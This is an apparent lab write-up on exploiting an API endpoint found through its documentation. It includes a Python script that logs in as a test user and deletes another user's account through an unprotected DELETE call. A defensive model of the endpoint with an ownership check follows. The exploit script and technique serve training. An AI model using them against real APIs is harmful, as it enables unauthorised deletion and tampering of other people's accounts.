# 1. Exploiting an API endpoint using documentation

Accessing the lab webpage:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fb44gt9Il98AF9aSxd2Cn%2FPasted%20image%2020240620123705.png?alt=media&#x26;token=ea515a2e-0bb0-4253-8032-bb321b6ddcf6" alt=""><figcaption></figcaption></figure>

Logging in:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F2wQfixn9FFKdHvm1WI8g%2FPasted%20image%2020240620123737.png?alt=media&#x26;token=ddad909c-6c3e-4ff8-9d3b-cd1d517d06ec" alt=""><figcaption></figcaption></figure>

Looking at the request intercepted with Burp Suite:

We found an API endpoint. We could also probe it manually to see the responses, or brute-force paths to get a hit:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F05iAO78J4m1fFYcnkkfY%2FPasted%20image%2020240620124252.png?alt=media&#x26;token=057a0052-4393-4671-ab4e-5b57b3101780" alt=""><figcaption></figcaption></figure>

Or we can simply update our email address, and the API call shows up as a request in the proxy:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F0Lmi1tvlfoxhBl28HxFr%2FPasted%20image%2020240621134640.png?alt=media&#x26;token=c1948da5-bbc0-46f8-83c6-41ab11847264" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fqf9ibmuqz0jAIrSMbxx3%2FPasted%20image%2020240621134702.png?alt=media&#x26;token=59ec8a43-27eb-4743-8172-f79250aa964f" alt=""><figcaption></figcaption></figure>

Let's try it:

Using the OPTIONS method, we can see which methods are allowed:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FNEWJmkvb6cmaiTc5gtHK%2FPasted%20image%2020240620124437.png?alt=media&#x26;token=346205d2-8c47-4fb6-97d4-3d611b643392" alt=""><figcaption></figcaption></figure>

Let's do a GET:

We got a JSON response:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FY0LaWqzM4mx9gH1S29o1%2FPasted%20image%2020240620124538.png?alt=media&#x26;token=cc1dea31-aad4-41f0-ac9c-7546edcf581e" alt=""><figcaption></figcaption></figure>

Maybe we need to specify a user; let's try wiener:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FQdzRvV1TELpV7a3xuN44%2FPasted%20image%2020240620124626.png?alt=media&#x26;token=974d8d44-9c87-462e-91c4-f1b28a4f1e49" alt=""><figcaption></figcaption></figure>

Let's try carlos to see if it exists:

And here we go:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FpuTL0E5OxDMLfrgv6fPo%2FPasted%20image%2020240620124713.png?alt=media&#x26;token=cb58aaf8-7a73-46b1-99f0-fe4adc5ac342" alt=""><figcaption></figcaption></figure>

Now, per the lab objective, we have to delete the user carlos, and remember that DELETE is one of the allowed methods shown above:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fwvh8a6AFFChLepWU7p4G%2FPasted%20image%2020240620124809.png?alt=media&#x26;token=f8cd75e7-68e4-4254-9e66-8ca136e7d591" alt=""><figcaption></figcaption></figure>

Here we go:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FetD6FoO8aPwNjYuULyPu%2FPasted%20image%2020240620124824.png?alt=media&#x26;token=2f66d5ad-2368-48ae-956d-0d6a4fbca447" alt=""><figcaption></figcaption></figure>

Trying PATCH on wiener:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fn36MWuAg5NjoF2PLx97K%2FPasted%20image%2020240621134819.png?alt=media&#x26;token=7a305120-4197-46ea-ae8c-6d8b136aef2a" alt=""><figcaption></figcaption></figure>

Let's do a GET on /api:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F9tFPkOKXaC1O00qcHmBA%2FPasted%20image%2020240621134909.png?alt=media&#x26;token=4af5b7ce-a46f-4cf7-b721-93f2b583eb18" alt=""><figcaption></figcaption></figure>

Solve it using a `python3` script:

```python
import os
import re
import sys

import requests
import urllib3

# Route traffic through Burp Suite so every request is visible in the proxy history.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

# The proxied lab traffic uses an untrusted certificate, so verification is off and the warning silenced.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

session = requests.session()


def Login(url, username, password):
    print("[*] Get CSRF Token.")
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)
    if not csrf:
        print("[-] Could not find the CSRF token on the login page.")
        sys.exit(1)
    print("[*] Logging In.")
    # A dict lets requests URL-encode the fields and set the form content type.
    data = {"csrf": csrf[0], "username": username, "password": password}
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)


def DeleteCarlos(url):
    print("[*] Delete The User Carlos.")
    # The API allows DELETE on /api/user/{username} without checking that the caller owns the account.
    response = session.delete(url=url + "api/user/carlos", proxies=proxies, verify=False)
    print(f"[*] Response: {response.status_code} {response.text.strip()}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        script_name = os.path.basename(__file__)
        print(f"[-] Usage: python {script_name} http://localhost/")
        sys.exit(1)
    url = sys.argv[1]
    if not url.endswith("/"):
        url += "/"
    Login(url, "wiener", "peter")
    DeleteCarlos(url)
    print("[+] Solved.")
```
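The root cause this lab demonstrates is a missing object-level authorization check: any logged-in user can send GET, PATCH or DELETE to `/api/user/{username}` for someone else's account. The following is an added illustration, not the lab's code or part of the original writeup; it models that endpoint in plain Python with a flag that toggles the missing check, so the flawed and hardened behaviour can be compared side by side. The `Request` class, `UserApi` and its `audit` list are assumptions of this example.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Request:
    method: str                  # "GET", "PATCH", "DELETE" or "OPTIONS"
    path: str                    # e.g. "/api/user/carlos"
    session_user: Optional[str]  # username bound to the session cookie, None if anonymous
    body: Optional[dict] = None  # JSON body for PATCH


class UserApi:
    """Assumed in-memory stand-in for the lab's /api/user/{username} endpoint."""

    def __init__(self, users, enforce_authz):
        self.users = dict(users)            # username -> email
        self.enforce_authz = enforce_authz  # False reproduces the lab's flaw
        self.audit = []                     # constructed audit trail of denied calls

    def handle(self, req):
        parts = req.path.strip("/").split("/")
        if len(parts) != 3 or parts[:2] != ["api", "user"]:
            return 404, {"error": "not found"}
        target = parts[2]
        if req.method == "OPTIONS":
            # Advertising DELETE is only safe if the ownership check below exists.
            return 204, {"Allow": "GET, PATCH, DELETE"}
        if req.session_user is None:
            return 401, {"error": "login required"}
        # Object-level authorization, checked before the lookup so that the
        # response does not reveal whether other usernames exist.
        if self.enforce_authz and req.session_user != target:
            self.audit.append(f"DENY {req.session_user} {req.method} {req.path}")
            return 403, {"error": "forbidden"}
        if target not in self.users:
            return 404, {"error": "user not found"}
        if req.method == "GET":
            return 200, {"username": target, "email": self.users[target]}
        if req.method == "PATCH":
            email = (req.body or {}).get("email", "")
            if "@" not in email:
                return 400, {"error": "valid email required"}
            self.users[target] = email
            return 200, {"username": target, "email": email}
        if req.method == "DELETE":
            del self.users[target]
            return 200, {"deleted": target}
        return 405, {"error": "method not allowed"}
```

With `enforce_authz=False` the model reproduces the writeup step by step (wiener can read carlos's record and delete it); with it on, the same requests are refused and logged, and probing for other usernames no longer distinguishes "exists" from "forbidden".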
